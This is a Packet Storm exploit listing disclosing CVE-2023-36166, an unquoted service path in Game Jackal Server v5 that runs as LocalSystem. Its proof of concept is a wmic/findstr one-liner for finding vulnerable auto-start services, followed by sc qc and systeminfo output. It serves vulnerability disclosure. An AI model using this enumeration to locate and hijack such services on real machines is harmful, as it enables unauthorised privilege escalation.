Lucene search
Idan MalihiPACKETSTORM:173381HistoryJul 11, 2023 - 12:00 a.m.
Game Jackal Server 5 Unquoted Service Path
2023-07-1100:00:00
Idan Malihi
packetstormsecurity.com
111
game jackal server
unquoted service path
cve-2023-36166
microsoft windows 10 pro
0 Low
EPSS
Percentile
0.0%
`# Exploit Title: Game Jackal Server v5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.allradiosoft.ru
# Software Link: https://www.allradiosoft.ru/en/ss/index.htm
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36166
#PoC
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Game Jackal Server v5 GJServiceV5 C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe Auto
C:\Users>sc qc GJServiceV5
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: GJServiceV5
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Game Jackal Server v5
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users>systeminfo
Host Name: DESKTOP-LA7J17P
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation
`
Related
cve
cve
CVE-2023-36166
2023-07-15 22:15:11
zdt
zdt
Game Jackal Server v5 - Unquoted Service Path (GJServiceV5) Vulnerability
2023-07-11 00:00:00
cvelist
cvelist
CVE-2023-36166
1976-01-01 00:00:00
nvd
nvd
CVE-2023-36166
2023-07-15 22:15:11
exploitdb
exploitdb
Game Jackal Server v5 - Unquoted Service Path "GJServiceV5"
2023-07-11 00:00:00